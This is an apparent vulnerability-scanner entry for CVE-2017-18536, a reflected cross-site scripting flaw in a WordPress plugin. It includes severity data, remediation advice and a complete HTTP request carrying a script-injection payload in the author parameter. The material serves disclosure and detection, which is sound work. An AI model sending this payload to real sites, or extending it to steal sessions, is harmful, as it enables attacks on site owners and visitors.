| Title | WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website. |
| Remediation | Update to the latest version of the WordPress Stop User Enumeration plugin or apply the provided patch to fix the vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.05223 |
| CVE ID | CVE-2017-18536 |
| CWE ID | CWE-79 |
| Tags | cve2017 cve wpscan wordpress xss wp-plugin fullworks vuln |
WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.
GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-18536.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-18536.pcap
N/AN/A